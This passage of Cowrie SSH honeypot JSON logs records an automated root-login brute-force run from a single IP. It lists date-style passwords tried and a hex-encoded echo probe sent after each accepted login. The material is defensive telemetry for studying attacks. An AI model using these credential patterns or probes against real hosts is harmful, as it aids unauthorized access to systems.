om","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:36.524302Z","src_ip":"212.227.125.160","session":"9c74d130cb03"}
{"eventid":"cowrie.login.success","username":"root","password":"170385","message":"login attempt [root/170385] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:36.806754Z","src_ip":"212.227.125.160","session":"9c74d130cb03"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:36.994023Z","src_ip":"212.227.125.160","session":"9c74d130cb03"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:36.994576Z","src_ip":"212.227.125.160","session":"9c74d130cb03"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:37.045097Z","src_ip":"212.227.125.160","session":"9c74d130cb03"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:37.046308Z","src_ip":"212.227.125.160","session":"9c74d130cb03"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:37.458874Z","src_ip":"196.251.86.249","session":"bb80f625eae4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53984,"dst_ip":"1.2.3.4","dst_port":22,"session":"301cbd58d284","protocol":"ssh","message":"New connection: 212.227.125.160:53984 (1.2.3.4:22) [session: 301cbd58d284]","sensor":"my-vps","timestamp":"2025-08-26T10:30:39.161505Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:39.162279Z","src_ip":"212.227.125.160","session":"301cbd58d284"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:39.185157Z","src_ip":"212.227.125.160","session":"301cbd58d284"}
{"eventid":"cowrie.login.success","username":"root","password":"170186","message":"login attempt [root/170186] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:39.263035Z","src_ip":"212.227.125.160","session":"301cbd58d284"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:39.329048Z","src_ip":"212.227.125.160","session":"301cbd58d284"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:39.329740Z","src_ip":"212.227.125.160","session":"301cbd58d284"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:39.354573Z","src_ip":"212.227.125.160","session":"301cbd58d284"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:39.356060Z","src_ip":"212.227.125.160","session":"301cbd58d284"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44828,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a468e9df243","protocol":"ssh","message":"New connection: 212.227.125.160:44828 (1.2.3.4:22) [session: 7a468e9df243]","sensor":"my-vps","timestamp":"2025-08-26T10:30:39.376166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:39.383304Z","src_ip":"212.227.125.160","session":"7a468e9df243"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:39.411229Z","src_ip":"212.227.125.160","session":"7a468e9df243"}
{"eventid":"cowrie.login.success","username":"root","password":"161188","message":"login attempt [root/161188] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:39.643447Z","src_ip":"212.227.125.160","session":"7a468e9df243"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:39.883517Z","src_ip":"212.227.125.160","session":"7a468e9df243"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:39.884218Z","src_ip":"212.227.125.160","session":"7a468e9df243"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:39.973684Z","src_ip":"212.227.125.160","session":"7a468e9df243"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:39.974908Z","src_ip":"212.227.125.160","session":"7a468e9df243"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44838,"dst_ip":"1.2.3.4","dst_port":22,"session":"13d6977d0c0b","protocol":"ssh","message":"New connection: 212.227.125.160:44838 (1.2.3.4:22) [session: 13d6977d0c0b]","sensor":"my-vps","timestamp":"2025-08-26T10:30:43.130558Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:43.134022Z","src_ip":"212.227.125.160","session":"13d6977d0c0b"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:43.158395Z","src_ip":"212.227.125.160","session":"13d6977d0c0b"}
{"eventid":"cowrie.login.success","username":"root","password":"161185","message":"login attempt [root/161185] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:43.291800Z","src_ip":"212.227.125.160","session":"13d6977d0c0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:43.394190Z","src_ip":"212.227.125.160","session":"13d6977d0c0b"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:43.394869Z","src_ip":"212.227.125.160","session":"13d6977d0c0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:43.418623Z","src_ip":"212.227.125.160","session":"13d6977d0c0b"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:43.419649Z","src_ip":"212.227.125.160","session":"13d6977d0c0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44850,"dst_ip":"1.2.3.4","dst_port":22,"session":"85f03dbd971c","protocol":"ssh","message":"New connection: 212.227.125.160:44850 (1.2.3.4:22) [session: 85f03dbd971c]","sensor":"my-vps","timestamp":"2025-08-26T10:30:43.440581Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:43.441221Z","src_ip":"212.227.125.160","session":"85f03dbd971c"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:43.464287Z","src_ip":"212.227.125.160","session":"85f03dbd971c"}
{"eventid":"cowrie.login.success","username":"root","password":"16101985","message":"login attempt [root/16101985] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:43.539928Z","src_ip":"212.227.125.160","session":"85f03dbd971c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:43.613982Z","src_ip":"212.227.125.160","session":"85f03dbd971c"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:43.614704Z","src_ip":"212.227.125.160","session":"85f03dbd971c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:43.662852Z","src_ip":"212.227.125.160","session":"85f03dbd971c"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:43.663932Z","src_ip":"212.227.125.160","session":"85f03dbd971c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44854,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf9b5074096f","protocol":"ssh","message":"New connection: 212.227.125.160:44854 (1.2.3.4:22) [session: cf9b5074096f]","sensor":"my-vps","timestamp":"2025-08-26T10:30:43.701411Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:43.736384Z","src_ip":"212.227.125.160","session":"cf9b5074096f"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:43.737167Z","src_ip":"212.227.125.160","session":"cf9b5074096f"}
{"eventid":"cowrie.login.success","username":"root","password":"16101984","message":"login attempt [root/16101984] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:43.946294Z","src_ip":"212.227.125.160","session":"cf9b5074096f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:44.115141Z","src_ip":"212.227.125.160","session":"cf9b5074096f"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:44.115876Z","src_ip":"212.227.125.160","session":"cf9b5074096f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:44.150930Z","src_ip":"212.227.125.160","session":"cf9b5074096f"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:44.151981Z","src_ip":"212.227.125.160","session":"cf9b5074096f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44870,"dst_ip":"1.2.3.4","dst_port":22,"session":"84bc55f418ea","protocol":"ssh","message":"New connection: 212.227.125.160:44870 (1.2.3.4:22) [session: 84bc55f418ea]","sensor":"my-vps","timestamp":"2025-08-26T10:30:45.177511Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:45.178480Z","src_ip":"212.227.125.160","session":"84bc55f418ea"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:45.201247Z","src_ip":"212.227.125.160","session":"84bc55f418ea"}
{"eventid":"cowrie.login.success","username":"root","password":"160788","message":"login attempt [root/160788] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:45.285494Z","src_ip":"212.227.125.160","session":"84bc55f418ea"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:45.409110Z","src_ip":"212.227.125.160","session":"84bc55f418ea"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:45.409801Z","src_ip":"212.227.125.160","session":"84bc55f418ea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:45.441476Z","src_ip":"212.227.125.160","session":"84bc55f418ea"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:45.442562Z","src_ip":"212.227.125.160","session":"84bc55f418ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44882,"dst_ip":"1.2.3.4","dst_port":22,"session":"05436ab1357b","protocol":"ssh","message":"New connection: 212.227.125.160:44882 (1.2.3.4:22) [session: 05436ab1357b]","sensor":"my-vps","timestamp":"2025-08-26T10:30:45.469959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:45.493435Z","src_ip":"212.227.125.160","session":"05436ab1357b"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:45.494680Z","src_ip":"212.227.125.160","session":"05436ab1357b"}
{"eventid":"cowrie.login.success","username":"root","password":"160684","message":"login attempt [root/160684] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:45.643872Z","src_ip":"212.227.125.160","session":"05436ab1357b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:45.712676Z","src_ip":"212.227.125.160","session":"05436ab1357b"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:45.713332Z","src_ip":"212.227.125.160","session":"05436ab1357b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:45.738150Z","src_ip":"212.227.125.160","session":"05436ab1357b"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:45.739499Z","src_ip":"212.227.125.160","session":"05436ab1357b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44896,"dst_ip":"1.2.3.4","dst_port":22,"session":"a31fa47eb2d6","protocol":"ssh","message":"New connection: 212.227.125.160:44896 (1.2.3.4:22) [session: a31fa47eb2d6]","sensor":"my-vps","timestamp":"2025-08-26T10:30:45.759689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:45.760386Z","src_ip":"212.227.125.160","session":"a31fa47eb2d6"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-c